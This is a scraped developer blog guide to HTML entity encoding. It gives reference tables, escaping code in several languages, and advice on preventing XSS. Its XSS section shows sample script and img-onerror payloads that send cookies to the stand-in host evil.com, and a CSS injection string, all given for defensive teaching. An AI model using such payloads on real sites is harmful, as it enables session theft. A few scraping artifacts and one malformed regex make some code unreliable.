DevToolBox無料
ブログ

HTMLエンティティエンコーダーオンライン:HTML特殊文字の完全ガイド

11分by DevToolBox
becomes harmless when the < and > are encoded as &lt; and &gt; — the browser displays it as literal text rather than executing it as HTML. Server-side frameworks handle this automatically when using template escaping, but raw innerHTML assignments in JavaScript bypass these protections."}},{"@type":"Question","name":"What is the difference between HTML entity encoding and URL encoding?","acceptedAnswer":{"@type":"Answer","text":"HTML entity encoding converts characters using the &name; or &#code; format and is used for embedding text safely in HTML documents. URL encoding (percent encoding) converts characters using the %XX format and is used for encoding data in URIs. They serve different contexts: HTML entities go in HTML files and templates; URL encoding goes in URLs and query strings. A URL inside an HTML attribute often requires both — the URL portion is percent-encoded, and then the HTML attribute value is entity-encoded."}},{"@type":"Question","name":"Which HTML entities are required vs optional?","acceptedAnswer":{"@type":"Answer","text":"Required: & must always be encoded as &amp; in HTML text and attribute values. < must always be encoded as &lt; in HTML text content. In HTML attribute values delimited by double quotes, \" must be encoded as &quot;. In HTML attribute values delimited by single quotes, apostrophes must be encoded as &apos; or &#39;. Optional but recommended: > can be used literally in most HTML text contexts but encoding as &gt; avoids edge cases. All other characters are optional — modern browsers handle the full UTF-8 character set directly, so accented letters, emoji, and symbols can be used as-is when the document declares UTF-8 charset."}}]}

TL;DR

HTML entities convert special characters (like &, <, >, ") into browser-safe representations. Always encode & as &amp; and < as &lt; in HTML. Use named entities for readability and numeric entities for any Unicode character. Proper encoding is the primary defense against XSS attacks. Modern UTF-8 pages can embed most characters directly, but the five HTML-special characters still require encoding. Try our free HTML Entity Encoder/Decoder →

Key Takeaways

  • Always encode &, <, >, ", and ' when inserting user data into HTML.
  • Named entities (&copy;) are readable; numeric entities (&#169; or &#xA9;) work for any Unicode character.
  • HTML entity encoding is different from URL percent-encoding — they serve different contexts.
  • Server-side frameworks auto-escape HTML in templates; but raw DOM innerHTML in JavaScript does not.
  • XSS attacks exploit unencoded HTML insertion; entity-encoding user input neutralizes them.
  • Modern UTF-8 documents can use accented letters and emoji directly — only the 5 HTML-special characters need encoding.
  • &nbsp; (non-breaking space) should be used for semantic line-break prevention, not for visual spacing.

What Are HTML Entities?

An HTML entity is a special text sequence used in HTML documents to represent characters that either have a reserved meaning in HTML syntax or cannot be typed directly on a standard keyboard. Every entity begins with an ampersand (&) and ends with a semicolon (;).

HTML entities were introduced because the HTML specification originally required documents to use only the 7-bit ASCII character set, yet authors needed a way to include accented letters, currency signs, mathematical symbols, and special punctuation. Today, HTML5 documents nearly universally declare UTF-8 encoding, which means most characters can be embedded directly. However, the five characters with special HTML significance still must be encoded as entities:

&
&amp;amp;
Ampersand
<
&amp;lt;
Less-than
>
&amp;gt;
Greater-than
"
&amp;quot;
Double quote
'
&amp;apos;
Apostrophe

There are two types of HTML entities:

  • Named entities — use a descriptive name enclosed in & and ;. Example: &copy; renders as ©. Only predefined characters have named entities.
  • Numeric entities — use the Unicode code point in decimal (&#169;) or hexadecimal (&#xA9;) form. Works for every Unicode character.

Encode or decode HTML entities instantly with our free online tool →

Essential HTML Entities Reference Table

The table below covers the most important HTML entities across several categories: security-critical characters, typography, currency, math, Greek letters, arrows, and accented Latin characters. All modern browsers support these entities.

CharacterNamed EntityNumeric EntityDescription / Use Case
&&amp;&#38;Ampersand — must always be encoded in HTML
<&lt;&#60;Less-than sign — opens an HTML tag
>&gt;&#62;Greater-than sign — closes an HTML tag
"&quot;&#34;Double quote — required in attribute values
'&apos;&#39;Single quote / apostrophe — use in attribute values
/&sol;&#47;Solidus (forward slash)
`&grave;&#96;Backtick / grave accent
(non-break)&nbsp;&#160;Non-breaking space — prevents line wrap
©&copy;&#169;Copyright symbol
®&reg;&#174;Registered trademark symbol
&trade;&#8482;Trademark (unregistered)
&euro;&#8364;Euro currency sign
£&pound;&#163;Pound sterling
¥&yen;&#165;Japanese yen
¢&cent;&#162;Cent sign
&ndash;&#8211;En dash — used for ranges (2010–2020)
&mdash;&#8212;Em dash — used as a sentence break
&lsquo;&#8216;Left single quotation mark
&rsquo;&#8217;Right single quotation mark (also apostrophe)
&ldquo;&#8220;Left double quotation mark
&rdquo;&#8221;Right double quotation mark
&hellip;&#8230;Horizontal ellipsis (three dots)
·&middot;&#183;Middle dot / interpunct
°&deg;&#176;Degree sign
±&plusmn;&#177;Plus-minus sign
×&times;&#215;Multiplication sign
÷&divide;&#247;Division sign
&ne;&#8800;Not equal to
&le;&#8804;Less-than or equal to
&ge;&#8805;Greater-than or equal to
&infin;&#8734;Infinity symbol
&empty;&#8709;Empty set
α&alpha;&#945;Greek letter alpha
β&beta;&#946;Greek letter beta
γ&gamma;&#947;Greek letter gamma
π&pi;&#960;Greek letter pi
σ&sigma;&#963;Greek letter sigma
Ω&Omega;&#937;Greek capital letter omega
&rarr;&#8594;Rightwards arrow
&larr;&#8592;Leftwards arrow
&uarr;&#8593;Upwards arrow
&darr;&#8595;Downwards arrow
&hearts;&#9829;Black heart suit
&spades;&#9824;Black spade suit
&diams;&#9830;Black diamond suit
&clubs;&#9827;Black club suit
é&eacute;&#233;Latin small e with acute
à&agrave;&#224;Latin small a with grave
ü&uuml;&#252;Latin small u with diaeresis
ñ&ntilde;&#241;Latin small n with tilde (Spanish)
ç&ccedil;&#231;Latin small c with cedilla

Named Entities vs Numeric Entities

HTML entities come in two syntactic forms, each with distinct trade-offs. Understanding when to use each form is key to writing maintainable, portable HTML.

Named Entities

Named entities use human-readable mnemonic names. The W3C HTML5 specification defines over 2,000 named character references. They are case-sensitive:&lt; is valid but &LT; (fully uppercase) is not defined in HTML5 (though some browsers accept it).

<!-- Named entities — readable and self-documenting --> <p>Copyright &copy; 2025 DevToolBox &mdash; All rights reserved.</p> <p>Price: &pound;49.99 or &euro;59.99</p> <p>Evaluate: x &le; y &ne; z</p> <p>Reaction: I &hearts; JavaScript</p>

Named entities are the best choice when: the entity is frequently used and recognizable, you want your HTML source to be readable without constant reference to code charts, and you are targeting modern browsers (all of them support the HTML5 named character references).

Numeric Entities — Decimal

Decimal numeric entities use the Unicode code point in base 10. Format: &#[decimal];. They work for any Unicode character, even those without named entities.

<!-- Decimal numeric entities --> <p>Copyright &#169; 2025</p> <!-- same as &copy; --> <p>Trademark &#8482;</p> <!-- &trade; --> <p>Snowman: &#9731;</p> <!-- no named entity! --> <p>Musical note: &#9835;</p> <!-- no named entity! --> <p>Emoji-like: &#128512;</p> <!-- U+1F600 grinning face -->

Numeric Entities — Hexadecimal

Hexadecimal numeric entities use the code point in base 16. Format: &#x[hex];. Developers who work with Unicode charts often prefer hex because Unicode values are typically specified in hex (U+00A9, U+20AC, etc.).

<!-- Hexadecimal numeric entities — map directly to Unicode code points --> <p>Copyright &#xA9; 2025</p> <!-- U+00A9 --> <p>Euro sign: &#x20AC;</p> <!-- U+20AC --> <p>Em dash &#x2014; separates ideas</p> <!-- U+2014 --> <p>Right arrow: &#x2192;</p> <!-- U+2192 --> <p>Snowflake: &#x2746;</p> <!-- U+2746 -->
Tip: In modern UTF-8 HTML5 documents, you can use Unicode characters directly without entities (e.g., type © directly as the © character). Entities are still required for the 5 HTML-special characters and are useful when your text editor cannot handle certain character sets or when generating HTML programmatically.

When to Encode vs When Not To

Knowing exactly when HTML entity encoding is mandatory, when it is recommended, and when it is unnecessary helps you write secure, correct HTML without over-encoding.

Always Encode (Required)

These four characters MUST be encoded in all HTML content contexts:
  • &&amp; — in text content AND in attribute values
  • <&lt; — in text content (opens a tag otherwise)
  • >&gt; — in text content (recommended; technically required after ]])
  • "&quot; — when the attribute value is delimited by double quotes
  • '&apos; or &#39; — when inside single-quote-delimited attributes
<!-- WRONG: unencoded ampersand breaks HTML parsing --> <a href="https://example.com?foo=1&bar=2">Link</a> <!-- CORRECT: encode the ampersand --> <a href="https://example.com?foo=1&amp;bar=2">Link</a> <!-- WRONG: unencoded < in text creates a broken tag --> <p>if a < b then c > d</p> <!-- CORRECT: encode angle brackets --> <p>if a &lt; b then c &gt; d</p> <!-- WRONG: unescaped quote terminates attribute early --> <input value="Say "hello" to me"> <!-- CORRECT: encode the inner double quotes --> <input value="Say &quot;hello&quot; to me"> <!-- ALTERNATIVE: use single quotes for the attribute --> <input value='Say "hello" to me'>

Encode When Generating HTML Dynamically

Any time user-supplied text, database content, or external data is inserted into an HTML document — whether via server-side templates or client-side DOM manipulation — special characters must be entity-encoded before insertion. This is the primary XSS prevention mechanism.

<!-- If userInput = '<script>alert(1)</script>' --> <!-- DANGEROUS — raw innerHTML injection --> <div id="output"></div> <script> document.getElementById('output').innerHTML = userInput; // XSS! </script> <!-- SAFE — use textContent which does NOT parse HTML --> <script> document.getElementById('output').textContent = userInput; // safe </script> <!-- SAFE — encode before inserting as innerHTML --> <script> function encodeHtml(str) { return str .replace(/&/g, '&amp;') .replace(/</g, '&lt;') .replace(/>/g, '&gt;') .replace(/"/g, '&quot;') .replace(/'/g, '&#39;'); } document.getElementById('output').innerHTML = encodeHtml(userInput); </script>

When Encoding Is Optional (UTF-8 Documents)

In modern HTML5 documents with <meta charset="UTF-8">, you can embed accented letters, currency signs, emoji, and most Unicode characters directly in your source. Using &eacute; for é or &euro; for € is optional — the literal characters are equally valid. Encoding everything is unnecessary noise.

<!-- HTML5 UTF-8 document — these are equivalent --> <p>Caf&eacute; au lait costs &euro;3.50</p> <p>Café au lait costs €3.50</p> <!-- Both render identically in all modern browsers --> <!-- The second form is preferred in UTF-8 source files -->

Context-Specific Encoding Rules

HTML ContextCharacters to EncodeExample
Text content (between tags)& < ><p>Tom &amp; Jerry &lt;3</p>
Double-quoted attribute& < " (> optional)<a href="x?a=1&amp;b=2">
Single-quoted attribute& < ' (> optional)<img alt='Tom &amp; Jerry'>
Unquoted attribute& < > " ' space tab(avoid unquoted attributes)
style attribute (CSS in HTML)& < " in CSS strings<div style="content: &quot;x&quot;">
JavaScript string in event handler& < > " '<div onclick="fn(&amp;quot;x&amp;quot;)">
URL in href/srcPercent-encode URL; then entity-encode & in HTML<a href="/?q=a%20b&amp;page=1">
CDATA sections]]> must be avoided(XML/XHTML specific)

HTML Entity Encoding vs URL Encoding

Developers often confuse HTML entity encoding and URL percent-encoding because both deal with special characters and often appear together. They are fundamentally different mechanisms for different purposes:

PropertyHTML Entity EncodingURL Percent Encoding
Format&amp;name; or &amp;#code;%XX (hex byte)
ContextHTML documents and templatesURLs, query strings, form data
StandardHTML5 Named Character ReferencesRFC 3986
Example: space&amp;#32; or &amp;nbsp;%20 or + (in form data)
Example: &&amp;amp;%26
Example: <&amp;lt;%3C
Example: ©&amp;copy; or &amp;#169;%C2%A9 (UTF-8 bytes)
Example: €&amp;euro; or &amp;#8364;%E2%82%AC (UTF-8 bytes)

A common scenario requires both types of encoding. When embedding a URL in an HTML attribute, the URL itself may contain percent-encoded characters, and the HTML attribute may also require HTML entity encoding of the ampersand in query strings:

<!-- URL with query parameters in an HTML attribute --> <!-- Step 1: URL encode the query values --> <!-- "hello world" -> "hello%20world" --> <!-- Step 2: HTML entity encode the & separating parameters --> <!-- WRONG — bare & breaks HTML validation --> <a href="https://example.com/search?q=hello%20world&lang=en">Search</a> <!-- CORRECT — & in HTML attribute must be &amp; --> <a href="https://example.com/search?q=hello%20world&amp;lang=en">Search</a> <!-- Note: URL path characters ARE percent-encoded; HTML attribute & IS entity-encoded --> <!-- They are two separate encoding layers applied in their respective contexts -->

Use our URL Encoder tool for percent-encoding and our HTML Entity Encoder tool for HTML entity encoding — they address different encoding needs.

HTML Entity Encoding in JavaScript

JavaScript does not have a built-in HTML escape function, but there are several correct and idiomatic approaches. Choosing the right API matters for both security and correctness.

The Correct Way: textContent and DOM APIs

The safest and most straightforward method is to use the DOM APIs that automatically handle encoding for you:

// --- Safe: textContent sets plain text, no HTML parsing --- const div = document.createElement('div'); div.textContent = '<script>alert("xss")</script>'; console.log(div.innerHTML); // Output: &lt;script&gt;alert("xss")&lt;/script&gt; // --- Safe: createTextNode for dynamic content --- const textNode = document.createTextNode('Tom & Jerry <3'); document.body.appendChild(textNode); // Renders as: Tom & Jerry <3 (no HTML interpretation) // --- Safe: setAttribute for setting attribute values --- const a = document.createElement('a'); a.setAttribute('title', 'Tom & Jerry <fansite>'); // Attribute is set correctly; browser handles the encoding internally

Manual Encoding Function (When innerHTML Is Required)

When you need to construct HTML strings (e.g., to set innerHTML with mixed text and markup), create a reliable encode function:

/** * Encode HTML special characters to prevent XSS. * Only encodes the 5 characters that have HTML significance. */ function encodeHtml(str: string): string { return String(str) .replace(/&/g, '&amp;') // Must be FIRST — otherwise &lt; becomes &amp;lt; .replace(/</g, '&lt;') .replace(/>/g, '&gt;') .replace(/"/g, '&quot;') .replace(/'/g, '&#39;'); // Use &#39; for broader compatibility than &apos; } /** * Decode HTML entities back to plain text. */ function decodeHtml(html: string): string { const txt = document.createElement('textarea'); txt.innerHTML = html; return txt.value; } // Usage examples: encodeHtml('<script>alert("xss")</script>'); // => '&lt;script&gt;alert(&quot;xss&quot;)&lt;/script&gt;' encodeHtml("Tom & Jerry's adventure"); // => 'Tom &amp; Jerry&#39;s adventure' decodeHtml('&lt;strong&gt;Hello &amp; World&lt;/strong&gt;'); // => '<strong>Hello & World</strong>'

Using DOMParser for Safe HTML Parsing

// DOMParser: parse HTML safely and extract text function htmlToText(html: string): string { const doc = new DOMParser().parseFromString(html, 'text/html'); return doc.body.textContent ?? ''; } htmlToText('<b>Hello</b> &amp; <i>World</i>'); // => 'Hello & World' // Alternative with template literals and tagged templates function safeHtml(strings: TemplateStringsArray, ...values: unknown[]): string { return strings.reduce((result, str, i) => { const value = values[i - 1]; return result + encodeHtml(String(value ?? '')) + str; }); } const username = '<script>alert(1)</script>'; const greeting = safeHtml`<p>Welcome, ${username}!</p>`; // => '<p>Welcome, &lt;script&gt;alert(1)&lt;/script&gt;!</p>'

Libraries for HTML Encoding in JavaScript

LibraryFunctionNotes
hehe.encode() / he.decode()Full HTML entity encoder/decoder — supports all named + numeric entities
entitiesencodeHTML() / decodeHTML()Lightweight; supports HTML4, HTML5, and XML entities
DOMPurifyDOMPurify.sanitize()Full XSS sanitizer — strips dangerous tags/attributes, not just encoding
escape-htmlescapeHtml(str)Minimal 5-character encoder for security — no decoding
xssxss(str)Configurable whitelist-based XSS filter
// Using the 'he' library (npm install he) import he from 'he'; he.encode('Tom & Jerry <fansite>'); // => 'Tom &amp; Jerry &lt;fansite&gt;' he.encode('Café ©', { useNamedReferences: true }); // => 'Caf&eacute; &copy;' he.decode('&lt;p&gt;Hello &amp; World&lt;/p&gt;'); // => '<p>Hello & World</p>' // Using 'escape-html' (minimal, security-focused) import escapeHtml from 'escape-html'; escapeHtml('<script>alert(1)</script>'); // => '&lt;script&gt;alert(1)&lt;/script&gt;'

HTML Entity Encoding in Python

Python ships with robust HTML encoding utilities in its standard library, making third-party dependencies unnecessary for basic use cases.

html.escape() and html.unescape()

import html # html.escape() — encodes the 5 HTML-special characters html.escape('<script>alert("xss")</script>') # => '&lt;script&gt;alert(&quot;xss&quot;)&lt;/script&gt;' html.escape('Tom & Jerry') # => 'Tom &amp; Jerry' # By default, quotes ARE encoded (quote=True is the default) html.escape('"Hello World"') # => '&quot;Hello World&quot;' # Set quote=False to skip quote encoding (only safe for text content, not attributes!) html.escape('"Hello"', quote=False) # => '"Hello"' # html.unescape() — decodes named and numeric entities html.unescape('&lt;p&gt;Hello &amp; World&lt;/p&gt;') # => '<p>Hello & World</p>' html.unescape('Caf&eacute; &copy; 2025 &mdash; All rights reserved.') # => 'Café © 2025 — All rights reserved.' html.unescape('&#169; &#x20AC; &#9829;') # => '© € ♥'

Python HTML Entity Encoding in Web Frameworks

# Django templates auto-escape by default # {{ variable }} is HTML-escaped automatically # Use {{ variable|safe }} only when you trust the content completely from django.utils.html import escape, format_html, mark_safe user_input = '<script>alert(1)</script>' safe_html = escape(user_input) # => '&lt;script&gt;alert(1)&lt;/script&gt;' # format_html safely combines trusted HTML and escaped values message = format_html('<p>Welcome, {}!</p>', user_input) # => '<p>Welcome, &lt;script&gt;alert(1)&lt;/script&gt;!</p>' # Flask/Jinja2 — auto-escapes in templates by default from markupsafe import escape as jinja_escape, Markup safe = jinja_escape('<b>Unsafe user input</b>') print(safe) # => &lt;b&gt;Unsafe user input&lt;/b&gt; print(type(safe)) # => <class 'markupsafe.Markup'> # Build safe HTML from trusted + untrusted parts trusted_html = Markup('<p>Hello, {}!</p>').format('<script>xss</script>') # => '<p>Hello, &lt;script&gt;xss&lt;/script&gt;!</p>'

Encoding All Named Entities in Python

# For full named entity encoding (e.g., © -> &copy;), use html.entities from html.entities import codepoint2name def encode_full_html(text: str, named: bool = True) -> str: """Encode all non-ASCII chars as named or numeric HTML entities.""" result = [] for char in html.escape(text): code = ord(char) if code > 127: name = codepoint2name.get(code) if named and name: result.append(f'&{name};') else: result.append(f'&#{code};') else: result.append(char) return ''.join(result) encode_full_html('Café © 2025 — Cost: €49') # => 'Caf&eacute; &copy; 2025 &mdash; Cost: &euro;49' encode_full_html('Café © 2025', named=False) # => 'Caf&#233; &#169; 2025'

HTML Entity Encoding in PHP

PHP provides two main functions for HTML encoding, each with important differences that affect security and character coverage.

htmlspecialchars() vs htmlentities()

<?php // htmlspecialchars() — encodes only the 5 HTML-special characters // This is the RECOMMENDED function for XSS prevention $user_input = '<script>alert("XSS")</script>'; echo htmlspecialchars($user_input, ENT_QUOTES | ENT_HTML5, 'UTF-8'); // => &lt;script&gt;alert(&quot;XSS&quot;)&lt;/script&gt; // Always pass ENT_QUOTES to encode both single and double quotes // Always pass 'UTF-8' as the charset in PHP < 8.1 (default changed to UTF-8 in 8.1) // htmlentities() — encodes ALL characters with HTML entity equivalents // More aggressive than needed for UTF-8 documents; can cause issues $text = 'Café © 2025 costs €49'; echo htmlentities($text, ENT_QUOTES | ENT_HTML5, 'UTF-8'); // => Caf&eacute; &copy; 2025 costs &euro;49 // htmlspecialchars_decode() — decodes back the 5 special chars only $encoded = '&lt;b&gt;Hello &amp; World&lt;/b&gt;'; echo htmlspecialchars_decode($encoded, ENT_QUOTES); // => <b>Hello & World</b> // html_entity_decode() — decodes ALL HTML entities $encoded = 'Caf&eacute; &copy; &euro;49'; echo html_entity_decode($encoded, ENT_QUOTES | ENT_HTML5, 'UTF-8'); // => Café © €49 // strip_tags() — removes HTML tags (NOT a security substitute for encoding!) $input = '<script>alert(1)</script><b>Bold</b>'; echo strip_tags($input); // => Bold (the script is removed, bold tags stripped, but NEVER rely on this for security) ?>

PHP Best Practices for HTML Encoding

PHP Security Rule: Always use htmlspecialchars($var, ENT_QUOTES | ENT_HTML5, 'UTF-8') when outputting user data in HTML. Do not rely on strip_tags() alone — it does not prevent XSS in attribute values or event handlers.
<?php // Create a reusable helper function function h(string $str): string { return htmlspecialchars($str, ENT_QUOTES | ENT_HTML5, 'UTF-8'); } // Usage in HTML templates ?> <div class="user-profile"> <h1><?= h($user['name']) ?></h1> <p class="bio"><?= h($user['bio']) ?></p> <a href="<?= h($user['website']) ?>"> <?= h($user['website_label']) ?> </a> <input type="text" value="<?= h($user['email']) ?>" placeholder="<?= h($placeholder) ?>"> </div> <?php // In Twig templates (Symfony, Craft CMS) // {{ variable }} — auto-escaped in Twig (same as h()) // {{ variable|raw }} — UNSAFE, skips escaping // {{ variable|e('html') }} — explicit HTML escaping // In Blade templates (Laravel) // {{ $variable }} — auto-escaped // {!! $variable !!} — UNSAFE raw output ?>

HTML Entity Encoding in Ruby

Ruby on Rails and the CGI module provide standard tools for HTML encoding. Rack-based frameworks use the Erubi template engine which auto-escapes by default.

# Ruby standard library: CGI module require 'cgi' CGI.escapeHTML('<script>alert("xss")</script>') # => "&lt;script&gt;alert(&quot;xss&quot;)&lt;/script&gt;" CGI.escapeHTML('Tom & Jerry') # => "Tom &amp; Jerry" CGI.unescapeHTML('&lt;b&gt;Hello&lt;/b&gt; &amp; World &copy;') # => "<b>Hello</b> & World ©" # Ruby on Rails — ERB templates # <%= variable %> — HTML-escaped automatically (calls html_escape / h) # <%== variable %> or <%= raw variable %> — UNSAFE raw output # Using ERB programmatically require 'erb' include ERB::Util html_escape('<script>alert(1)</script>') # => "&lt;script&gt;alert(1)&lt;/script&gt;" h('<script>alert(1)</script>') # h() is an alias for html_escape # => "&lt;script&gt;alert(1)&lt;/script&gt;" # ActiveSupport (Rails) — content_tag for safe HTML generation # content_tag(:p, user.name) # auto-escaped # content_tag(:p, user.name.html_safe) # UNSAFE — use only for trusted content # Rack::Utils require 'rack/utils' Rack::Utils.escape_html('Tom & Jerry <3') # => "Tom &amp; Jerry &lt;3"

XSS Prevention with HTML Entity Encoding

Cross-Site Scripting (XSS) is one of the most prevalent web security vulnerabilities. It occurs when an attacker injects malicious scripts into web pages viewed by other users. HTML entity encoding is the primary defense, but it must be applied correctly and in the right context.

Understanding XSS Attack Vectors

XSS Attack Types:
  • Reflected XSS: Malicious script in the URL is reflected back in the response.
  • Stored XSS: Malicious script stored in the database, served to all visitors.
  • DOM-based XSS: Script injected via client-side DOM manipulation without server involvement.
<!-- Reflected XSS Example --> <!-- URL: https://example.com/search?q=<script>document.location='https://evil.com?c='+document.cookie</script> --> <!-- VULNERABLE server response --> <p>Results for: <script>document.location='https://evil.com?c='+document.cookie</script></p> <!-- SAFE server response (after HTML encoding the query parameter) --> <p>Results for: &lt;script&gt;document.location=&#39;https://evil.com?c=&#39;+document.cookie&lt;/script&gt;</p> <!-- Stored XSS Example — comment stored in database --> <!-- Attacker comment: <img src=x onerror="fetch('https://evil.com?'+document.cookie)"> --> <!-- VULNERABLE — displaying raw stored content --> <div class="comment">[raw comment HTML here]</div> <!-- SAFE — HTML-encode before rendering --> <div class="comment">&lt;img src=x onerror=&quot;fetch(&#39;https://evil.com?&#39;+document.cookie)&quot;&gt;</div>

Context-Sensitive Escaping — Why One Encoder Is Not Enough

A critical and often misunderstood principle: HTML entity encoding alone is not sufficient for all injection contexts. Different parts of an HTML document require different escaping strategies:

ContextRequired EscapingExample
HTML body textHTML entity encode<p>{user_input}</p>
HTML attribute valueHTML entity encode + quote attribute<input value="{user_input}">
JavaScript string in script tagJavaScript string escape (\\, \", \n, etc.)<script>var x = "{user_input}";</script>
CSS value in style tagCSS escape<style>color: {user_input};</style>
URL in href/srcURL encode, then HTML encode<a href="{url_encoded_then_html_encoded}">
JSON in HTMLJSON encode + avoid </script><script>var data = {json_encoded};</script>
// JavaScript context inside <script> tags requires JS string escaping, NOT HTML entities // WRONG — HTML encoding in a JS context const name = '&lt;/script&gt;&lt;script&gt;alert(1)&lt;/script&gt;'; // The browser HTML-decodes before parsing JS, making the injection work! // CORRECT — JSON encode for JavaScript embedding // In a server template (e.g., Node.js with Handlebars): const userData = JSON.stringify({ name: userName }) .replace(/</script>/gi, '<\/script>'); // prevents premature </script> closing // Better: use a dedicated JSON-in-HTML serializer // e.g., json-stringify-safe, or serialize-javascript (npm package) import serialize from 'serialize-javascript'; const userDataStr = serialize({ name: userName }, { isJSON: true }); // CSS injection is also real — never embed user input in CSS without escaping // WRONG: // <div style="background-image: url({userUrl});"> // An attacker can use: ); expression(alert(1)); background:( // SAFE: Never allow user input in CSS values; use whitelisting or data attributes instead

Content Security Policy as Defense in Depth

HTML encoding neutralizes most XSS, but a Content Security Policy (CSP) header provides a second layer of defense that limits what scripts can execute even if encoding fails:

# HTTP Response Header — strict CSP Content-Security-Policy: default-src 'self'; script-src 'self' 'nonce-{random-nonce-per-request}'; style-src 'self' 'nonce-{random-nonce-per-request}'; img-src 'self' data: https:; font-src 'self'; object-src 'none'; base-uri 'self'; form-action 'self'; frame-ancestors 'none'; # With nonces, only scripts with the matching nonce attribute execute: <script nonce="rAnd0mNonce123"> // This script is allowed by CSP </script> # Any injected <script> without the nonce is blocked by the browser
Defense-in-depth approach:
  1. HTML entity encode all user-supplied data in HTML contexts (primary defense).
  2. Use context-appropriate escaping (JS, CSS, URL) in other contexts.
  3. Implement Content Security Policy headers (secondary defense).
  4. Use HTTP-only cookies to limit cookie theft even if XSS occurs.
  5. Use a well-tested sanitization library (like DOMPurify) for rich text user input.

HTML Entities in React / JSX

React automatically HTML-encodes all string values rendered via JSX expressions. This means you rarely need to manually encode entities in React applications. However, there are specific patterns for using HTML entities in JSX.

React Auto-Escaping

// React auto-escapes all JSX expressions const userInput = '<script>alert("xss")</script>'; const Comment = () => <p>{userInput}</p>; // Renders as: <p>&lt;script&gt;alert("xss")&lt;/script&gt;</p> // Browser displays: <script>alert("xss")</script> (as text, not code) // dangerouslySetInnerHTML bypasses auto-escaping — use with extreme caution const TrustedHtml = ({ html }) => ( <div dangerouslySetInnerHTML={{ __html: html }} /> ); // Only use when html is sanitized by DOMPurify or similar

Using HTML Entities in JSX Source Code

// In JSX string content, use HTML entity names or numeric codes // Option 1: HTML entity name (inside JSX expressions {}) const Pricing = () => ( <p>Price: &euro;49 &mdash; &copy; 2025</p> ); // But &euro;, &mdash;, &copy; are resolved at HTML parsing level by the browser, // not by React/JSX. This works because JSX compiles to HTML. // Option 2: Unicode escape in JS string const Pricing2 = () => ( <p>Price: {'€'}49 {'—'} {'©'} 2025</p> ); // Option 3: Literal Unicode characters in JSX (requires UTF-8 source file) const Pricing3 = () => ( <p>Price: €49 — © 2025</p> ); // This is the cleanest approach for UTF-8 React projects // Option 4: HTML entity codes in JSX text (NOT in expressions) // These must be inside JSX text, not inside {} const Arrow = () => <span>&rarr;</span>; // renders → const Copyright = () => <span>&copy;</span>; // renders © // Common JSX entity pitfall — apostrophes in text // WRONG — JSX parser error // const Bad = () => <p>You're welcome</p>; // will cause linter warning // CORRECT options: const Good1 = () => <p>{"You're welcome"}</p>; // string expression const Good2 = () => <p>You&apos;re welcome</p>; // named entity const Good3 = () => <p>You&#39;re welcome</p>; // numeric entity const Good4 = () => <p>You{"’"}re welcome</p>; // Unicode curly apostrophe

HTML Entities in JSX Attribute Values

// JSX attribute values are JavaScript expressions — use Unicode or strings // NOT HTML entities in attribute values (React doesn't parse entities in attributes) // WRONG — HTML entities in JSX attribute values are literal strings const BadTitle = () => <div title="Tom &amp; Jerry">...</div>; // The title will be "Tom &amp; Jerry" literally, not "Tom & Jerry"! // CORRECT — use literal characters or Unicode in JSX attribute values const GoodTitle1 = () => <div title="Tom & Jerry">...</div>; // literal & const GoodTitle2 = () => <div title={"Tom & Jerry"}>...</div>; // JS string // For aria labels and similar attributes const Icon = () => ( <button aria-label="Copy to clipboard &rarr;"> {/* WRONG */} Copy </button> ); const IconFixed = () => ( <button aria-label="Copy to clipboard →"> {/* CORRECT */} Copy </button> );

HTML Entities in Email, XML, and Other Contexts

HTML Entities in Email Templates

HTML email has inconsistent and often outdated rendering engines. Entity encoding is critical for email compatibility because many email clients use older HTML parsing engines.

<!-- HTML Email Best Practices for Entities --> <!-- Always encode &, <, >, " in email HTML content --> <p>Tom &amp; Jerry Newsletter &mdash; Issue #42</p> <!-- Use numeric entities for special characters in email --> <!-- Named entities like &mdash; &lsquo; &rsquo; may not be supported in all clients --> <p>Tom &amp; Jerry Newsletter &#8212; Issue #42</p> <!-- safer --> <!-- Non-breaking spaces are widely supported --> <td>100&nbsp;items</td> <!-- Emoji in email: use UTF-8 encoding + declare in <head> --> <!-- Some clients strip emoji; use text fallbacks --> <p>&#127881; Happy New Year! (🎉 if supported)</p> <!-- Copyright in email footer --> <p>&copy; 2025 Company Name. All rights reserved.</p> <p>&#169; 2025 Company Name. All rights reserved.</p> <!-- numeric fallback -->

HTML Entities in XML and SVG

XML is stricter than HTML. XHTML (HTML served as XML) only supports five predefined entities by default. SVG documents embedded in HTML follow HTML entity rules; SVG as standalone XML follows XML rules.

<!-- XML predefined entities (the only 5 built-in XML entities) --> &amp; <!-- & --> &lt; <!-- < --> &gt; <!-- > --> &quot; <!-- " --> &apos; <!-- ' --> <!-- In XML, other named entities like &copy; &mdash; are NOT defined! --> <!-- You must use numeric entities or declare them in the DOCTYPE --> <?xml version="1.0" encoding="UTF-8"?> <document> <text>Copyright &#169; 2025 &#8212; All rights reserved.</text> <formula>x &#60; y &#38;&#38; y &#62; 0</formula> </document> <!-- SVG text in HTML — HTML entity rules apply --> <svg xmlns="http://www.w3.org/2000/svg" width="200" height="50"> <text x="10" y="30">Tom &amp; Jerry &rarr;</text> </svg> <!-- SVG as standalone XML file — XML rules apply --> <?xml version="1.0" encoding="UTF-8"?> <svg xmlns="http://www.w3.org/2000/svg"> <text>Tom &amp; Jerry &#8594;</text> <!-- &rarr; not valid in XML! --> </svg>

HTML Entities in CSS content Property

/* CSS content property — does NOT understand HTML entities */ /* WRONG — HTML entities do not work in CSS */ .icon::before { content: '&rarr;'; /* Renders literally as "&rarr;" — NOT an arrow! */ } /* CORRECT — use Unicode escape sequences in CSS */ .icon::before { content: '\2192'; /* Unicode escape for → (U+2192) */ } .copyright::after { content: '\00A9'; /* © copyright symbol */ } .dash::before { content: '\2014 '; /* em dash — */ } /* Or embed the actual Unicode character directly */ .check::before { content: '✓'; /* Direct Unicode character — works in UTF-8 CSS files */ } /* Common Unicode values for CSS content */ /* \201C = " left double quote */ /* \201D = " right double quote */ /* \2018 = ' left single quote */ /* \2019 = ' right single quote */ /* \2026 = … ellipsis */ /* \00AB = « left guillemet */ /* \00BB = » right guillemet */

Complete HTML Special Characters by Category

Punctuation and Typography

CharacterNamedNumericUse case
&lsquo;&#8216;Left single quotation mark — 'quoted'
&rsquo;&#8217;Right single quotation mark / apostrophe — it's
&ldquo;&#8220;"Left double quotation mark — "quoted"
&rdquo;&#8221;"Right double quotation mark — "quoted"
&hellip;&#8230;Horizontal ellipsis — continued...
&ndash;&#8211;En dash — used in ranges (2010–2020)
&mdash;&#8212;Em dash — sentence break or parenthetical
«&laquo;&#171;«French-style left guillemet»
»&raquo;&#187;«French-style right guillemet»
